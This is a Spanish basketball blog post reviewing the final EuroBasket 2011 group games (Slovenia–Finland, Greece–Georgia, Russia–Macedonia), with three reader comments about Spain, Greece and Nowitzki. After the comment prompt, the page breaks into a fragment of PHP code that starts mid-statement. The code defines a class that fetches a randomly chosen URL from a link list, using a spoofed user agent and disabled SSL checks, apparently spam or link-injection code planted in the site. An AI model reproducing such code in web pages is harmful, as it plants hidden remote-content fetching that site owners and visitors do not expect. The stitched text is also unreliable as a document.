EuroNBAsket 2011: Näkemiin Suomi (Adiós Finlandia)

13 de September de 2011 por TheDeerHunter

Por fin se acaban las liguillas en el Eurobasket. Teníamos ganas, especialmente en la parte del cuadro que nos ocupa. Ha sido bastante tostón, para qué nos vamos a engañar…

Si acaso podemos librar de la quema a Finlandia, selección humilde donde las haya pero que ha representado tan dignamente el papel de modesto rebelado. Esa actitud de descaro tan vinculada a los jugones, de nada que perder y mucho que ganar, que ha estado a punto de meterles entre los 8 mejores de Europa por delante de algún ilustre.

Por lo demás nada más allá de lo esperado: 1º Rusia, 2º Macedonia, 3º Grecia y 4º Eslovenia, con la salvedad de que Macedonia volvió a demostrar ayer que es una selección tan seria como Rusia. Monya hizo honor a su nombre anotando su segundo clutch del campeonato. De los 5’4 escasos puntos que anota por partido, un cierto porcentaje son canastas ganadoras, la de ayer pedrolo a tabla. No en vano, si llegó a ser NBA sería por algo, suponemos…

Eslovenia 67 – Finlandia 60: Otra de las deficiencias a mi entender de la organización es la planificación de la última jornada, dando más lugar que nunca a especulaciones bochornosas como la del otro día. No es el caso pero para un partido a vida o muerte que hay en este grupo van y lo colocan en el peor horario de todos.

En términos puramente baloncestísticos, Finlandia lo intentó todo para volver a liarla, sobre todo en un arreón desesperado en el último cuarto, pero de todos los tiradores que nombramos el otro día únicamente Koponen y Huff estuvieron mínimamente inspirados. En condiciones normales Eslovenia debería ser superior siempre. Ayer sólo fue capaz de imponerse claramente en un parcial de 28-16 en el segundo, con Lorbek y Slokar de estiletes. Veremos si son capaces de repetirlo contra los Gasoles. Muchas dudas.

Destacado: Uros Slokar 13 ptos, 8 reb, 1 asis.

Grecia 73 – Georgia 60: Trámite cómodo. Georgia está deseando volver a casa desde hace algunos días y ayer bastante hicieron con plantar cara la primera parte. Choque sin ningún interés. A lo sumo mencionar el completo partido de Fotsis y los 14 rebotes de Shermanidi.

Destacado: Antonios Fotsis 10 ptos, 4 reb, 1 asis, 3 rob, 2 tap.

Rusia 63 – Macedonia 61: Igualito que el España-Francia. Éste sí fue un choque digno de cerrar una fase. El premio no era asunto baladí, evitar nada menos que a Lituania. Como es natural los dos equipos se lo tomaron a muerte. Rusia impuso su poderío físico y ni el partidazo de Pero Antic mermó la sangría bajo aros. Macedonia compensó este vital factor a base de triples que le hubieran llevado a la victoria. Al final no pudieron aprovechar el pésimo partido de Kirilenko. La falta de acierto en algo tan básico como el tiro libre y la fortuna de Sergei Monya le condenan a cruzarse con la anfitriona.

Destacados: Alekshey Shved 14 ptos, 6 reb, 4 asis
Pero Antic 15 ptos (3/4 3p), 10 reb, 5 asis, 2 rob, 1 tap; Bo McCalebb 16 ptos, 4 reb, 2 asis, 1 rob

Comenta

3 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    A Georgia y Finlandia les queda el regusto de haber competido dos semanas a un nivel fenomenal, jugando 8 partidos contra equipos que normalmente jamás podrían haberse cruzado y bueno, si sigue el formato de 24 selecciones, nos tendremos que acostumbrar a que sean pasajeros con billete preferente en el campeonato. Ciero es que Georgia ha estado muy flojita, no ganando ningún partido en esta fase y con Pachulia mucho más tiempo en el banco que en la cancha. Algo ha debido pasar ahí. De hecho, sus partidos en la preparación estaban siendo una maravilla y después en el torneo no ha hecho nada de lo que prometía. El resto han demostrado estar comprometidos. Y Finlandia, pues estos chicos llevan compitiendo en el preeuropeo desde mediados de agosto, así que supongo que llevarían entrenando casi todo el verano, y haber llegado donde lo han hecho, quedándose a siete puntos del cruce… chapó! Realmente nadie ha destacado por encima del resto, Koponen ha sido quizá su mejor jugador, pero demasiado abusón en el tiro, y otros jugadores como Kotti o Huff han podido aportar más sobriedad en algunos momentos. Extrañísimo campeonato de Ranikko. Este jugador llegó a jugar en la liga española, en el CB Granada, y debería haber demostrado mucho más con su selección.

    A partir de mañana, muchos dicen que comienza el campeonato. Yo también. Hemos tenido algunas víctimas esperadas (Italia, Croacia) y no esperadas (Turquía y Alemania), aunque desde el principio, con las dos partes del cuadro tan desiguales ya se sabía que esto iba a pasar.

    Yo he sido de los que más caña ha metido a España desde el principio, pero he de reconocer que ha cambiado la actitud. Como principal debe, sí que echo mucho en falta la aportación ofensiva de los bases, Scariolo los tiene explotados en la defensa y no les da casi nada de autonomía en el ataque, y la que tienen no la están aprovechando. Calderón está bastante gris tirando; Navarro tiene un rol bastante reducido, no creo que esté en los 20 minutos por partido, y eso en la lucha por las medallas nos puede pasar factura; En el haber: por fin ha espabilado Rudy, pieza clave también si queremos ir a los Juegos; y bueno, los secundarios parecen que van asumiendo su rol. San Eme estuvo perfecto contra Serbia, Claver y Llull también jugaron bien contra Francia, y Sada lo poco que juega no resta, haciendo entre siete y ocho de valoración. Quizá el que me está decepcionando un poco es Serge Ibaka, no por su actitud, que pienso que es la de querer integrarse igual que sus compañeros, sino porque para él es complicado jugar tantos sistemas, no está acostumbrado en la NBA y creo que está algo perdido en el juego ofensivo, y eso nos resta frescura. Habría que plantearse en estos días de descanso programar jugadas más fáciles para él cuando esté en cancha, que se puedan realizar sin que tenga que jugar como los Gasoles, más artistas con el pase.

    Mañana empieza la fiesta europea del basket. Por fin!!! Creo que pasarán sin muchas complicaciones España, eliminando a Eslovenia, y Francia, eliminando a Grecia. Aunque estos últimos se merecen unas semifinales contra Rusia perdidas en el último segundo por un triple a cucharón lanzado por Moñas que entre fuera de tiempo y que los árbitros den por bueno. Por especuladores. (Y los griegos no deberían estar ahí, pero son los niños mimados de la Fiba y todos los veranos mangan alguna parecida).

      Citar

  2. Nacho dice:
    #2

    Vale, Grecia son los niños mimados de la FIBA.Incluso tramposos y marrulleros muchas veces. Pero son necesarios. Un país que ha dado a Gallis (inmenso jugador) y a Yannakis (también vale para el debate de los bases) , y luego Papaloukas, Diamantidis, etc… merece el respeto de lo que son, unos JUGONES del copón. (Coño, ha rimado y todo) Y se que nos han jodido muchas veces con marrulerías y tal, pero… Grecia es Grecia, y en basket eso es mucho.
    Lo de Croacia yo no me lo esperaba, bien es cierto que hace mucho que no les veo, pero lo de Italia, Turquia y Alemania, teniendo delante lo que tenían, era totalmente previsible. Si las tres hubiesen estado en el otro grupo, al menos dos estarían en cuartos, Turquía seguro. (bueno, no me juego nada que de los turcos no te puedes fiar. Aunque con estos griegos en pañales, si hubieran podido haberlos echado fuera, hubíeramos visto el talento que tienen los jodíos con las ganas de los grandes de verdad)
    Y en cuanto a España, es de lejos el mejor equipo de este europeo, si no ganan será por que a alguien le salga el partido de su vida, y España presente lagunas.
    Y lanzo una pegunta: Al analizar trayectorias, ¿nos fijamos solo en la NBA, o ponemos las selecciones de por medio? Porque si nos vale la 2ª premisa, la impronta de Pau es superior a la de Dirk. Y no olvidemos que hems tenido grandes equipos a lo largo de la historia, con Bucató, Brabender, Corbalán, Itu, Epi… y compañía, pero el gen ganador nos lo dio Pau y su generacióin, sin duda alguna. (Bueno, la pregunta trampa está hecha, y como mal moderador de la tele. que hay muchos, he dejado mi opinión.)

      Citar

  3. Txusma dice:
    #3

    Juraría que Dirk Nowitzki nunca ha tenido al lado a gente como Navarro, Rudy, Marc Gasol o Garbajosa a nivel de selecciones y aun así ha ganado una medalla de plata en un Europeo y una de bronce en un Mundial. No es moco de pavo para una selección en la que el segundo hombre podía ser Femerling y el tercero Okulaja.
    Dirk ha sido como un espejismo en el desierto del nivel del baloncesto alemán. A ver si Benzing consolida lo que apunta.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>